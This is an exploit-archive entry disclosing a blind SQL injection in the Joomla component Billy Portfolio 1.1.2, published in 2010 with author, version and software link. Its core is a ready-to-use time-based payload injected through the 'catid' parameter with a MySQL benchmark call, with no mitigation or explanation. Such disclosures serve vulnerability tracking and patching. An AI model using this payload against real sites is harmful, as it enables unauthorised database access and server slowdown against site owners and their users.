Joomla Component Billy Portfolio 1.1.2 Blind SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component Billy Portfolio 1.1.2 Blind SQL Injection
# Published : 2010-12-10
# Author : jdc
# Previous Title : Clear iSpot/Clearspot CSRF Vulnerabilities
# Next Title : Sulata iSoft (stream.php) Local File Disclosure Exploit

# Exploit Title: Joomla Component Billy Portfolio 1.1.2 Blind SQL Injection
# Date: 10 Dec 2010
# Author: jdc
# Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/portfolio/14834
# Version: 1.1.2

index.php?option=com_billyportfolio&view=billyportfolio&catid=-1 and
if(1,benchmark(5000000,md5(1)),1)